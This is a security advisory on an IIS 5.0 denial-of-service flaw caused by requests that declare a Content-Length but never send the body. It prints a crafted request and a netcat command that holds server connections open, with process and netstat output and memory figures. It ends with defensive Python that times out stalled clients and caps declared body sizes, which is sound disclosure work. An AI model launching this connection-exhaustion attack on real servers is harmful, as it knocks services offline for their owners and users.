A security flaw exists in the way IIS handles mislabeled Content-Length requests (requests that carry an HTTP Content-Length header without a body of that length). The flaw can cause the server to consume massive amounts of memory, which can lead to a denial of service.
Credit:
The information has been provided by Ivan Hernandez Puga.
The vulnerability by itself is not a security flaw, but it can probably lead to a denial of service with some tweaking. When you send a bad request to a Microsoft IIS/5.0 server, it returns an error and closes the connection, just as it does when you fail to authenticate.
Example (1):
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic
Then let us add a "Content-Length: 5300643" header field.
When you send the request to the server, it will hang there waiting for something to happen and never close the connection.
Example (2):
$ cat >bogus.txt <<'EOF'
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic
EOF
$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
PID PPID PGID WINPID TTY UID STIME COMMAND
696 1 696 696 con 500 12:22:37 /usr/bin/bash
2464 696 2464 2464 con 500 12:23:56 /usr/bin/nc
2532 696 2532 1552 con 500 12:29:16 /usr/bin/ps
$ netstat -an |grep 192.168.0.10
TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED
Now you have an open connection that is waiting. You can open as many as you want: the server never closes the connections and you should never see a timeout.
With something like 4322 connections opened using the method described, the Windows server's memory consumption jumped from around 404 MB to 920 MB.
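A defensive counterpart to the behaviour described above, added here as an example and not part of the original advisory or of IIS: a request reader that bounds every read with a timeout and caps the declared Content-Length, so a client that announces a body and never sends it is dropped instead of being held open. The socketpair, the MAX_HEADER_BYTES constant and the sample requests are constructed for the demonstration.

```python
import socket
MAX_HEADER_BYTES = 8192  # assumed cap on the header section; tune for your deployment

def read_request(conn, max_body, timeout):
    """Read one HTTP/1.x request without blocking forever on a declared body that never arrives.
    Returns (status, detail) with status "ok", "reject" or "timeout"."""
    conn.settimeout(timeout)  # bounds every recv(): a silent client frees the worker after `timeout`
    buf = b""
    try:
        while b"\r\n\r\n" not in buf:  # header section not terminated yet
            if len(buf) > MAX_HEADER_BYTES:
                return ("reject", "header section too large")
            chunk = conn.recv(4096)
            if not chunk:
                return ("reject", "client closed before end of headers")
            buf += chunk
        head, body = buf.split(b"\r\n\r\n", 1)
        declared = 0
        for line in head.split(b"\r\n")[1:]:  # skip the request line
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                if not value.strip().isdigit():
                    return ("reject", "malformed Content-Length")
                declared = int(value.strip())
        if declared > max_body:  # refuse before reserving anything for the body
            return ("reject", "Content-Length %d exceeds cap %d" % (declared, max_body))
        while len(body) < declared:  # wait for the body only now, and only for `declared` bytes
            chunk = conn.recv(min(4096, declared - len(body)))
            if not chunk:
                return ("reject", "client closed before body was complete")
            body += chunk
        return ("ok", body)
    except socket.timeout:
        return ("timeout", "client stalled; dropping connection")

def simulate(request, max_body=1_000_000, timeout=0.3):
    """Feed `request` from a fake client that then goes silent; socketpair keeps it offline."""
    client, server = socket.socketpair()
    try:
        client.sendall(request)
        return read_request(server, max_body, timeout)
    finally:
        client.close()
        server.close()

# Constructed samples: the advisory's mislabeled request (headers only), a small stalled one, a complete one.
HDRS = b"GET /testfile HTTP/1.1\r\nHost: 192.168.0.10\r\nConnection: Keep-Alive\r\n"
BOGUS_BIG = HDRS + b"Content-Length: 5300643\r\n\r\n"
BOGUS_SMALL = HDRS + b"Content-Length: 5\r\n\r\n"
GOOD = HDRS + b"Content-Length: 5\r\n\r\nhello"
```

The oversized declaration is refused immediately, the small stalled one is dropped when the read timeout expires, and only the complete request is accepted.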